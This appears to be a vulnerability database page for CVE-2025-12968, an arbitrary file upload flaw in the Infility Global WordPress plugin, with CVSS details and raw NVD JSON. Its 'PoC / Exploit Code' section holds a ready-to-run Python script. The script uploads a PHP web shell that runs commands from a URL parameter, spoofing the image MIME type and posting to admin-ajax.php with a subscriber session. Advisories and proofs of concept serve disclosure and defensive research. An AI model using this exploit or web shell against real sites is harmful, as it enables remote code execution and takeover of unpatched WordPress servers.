Security Vulnerability Report
中文
CVE-2025-12968 CVSS 8.8 HIGH

CVE-2025-12968

Published: 2025-12-12 04:15:41
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Infility Global plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation and capability checks in all versions up to, and including, 2.14.42. This is due to the `upload_file` function in the `infility_import_file` class only validating the MIME type which can be easily spoofed, and the `import_data` function missing capability checks. This makes it possible for authenticated attackers, with subscriber level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Infility Global plugin for WordPress <= 2.14.42

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com' # Webshell content webshell = '<?php if(isset($_GET[\'cmd\'])){ system($_GET[\'cmd\']); } ?>' # Prepare the file upload files = { 'file': ('shell.php', webshell, 'image/jpeg') # Spoof MIME type } data = { 'action': 'infility_import_file', 'filename': 'shell.php' } # Authentication cookie (subscriber level or higher) cookies = { 'wordpress_test_cookie': 'WP Cookie check', # Add valid WordPress session cookie here } # Send the malicious request try: response = requests.post( f'{target}/wp-admin/admin-ajax.php', files=files, data=data, cookies=cookies, verify=False ) print(f'Status: {response.status_code}') print(f'Response: {response.text}') except Exception as e: print(f'Error: {e}')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12968", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:40.810", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Infility Global plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation and capability checks in all versions up to, and including, 2.14.42. This is due to the `upload_file` function in the `infility_import_file` class only validating the MIME type which can be easily spoofed, and the `import_data` function missing capability checks. This makes it possible for authenticated attackers, with subscriber level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3421596%40infility-global&new=3421596%40infility-global&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/infility-global/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/542a18f6-9d17-4e54-85e1-e01630ca371e?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.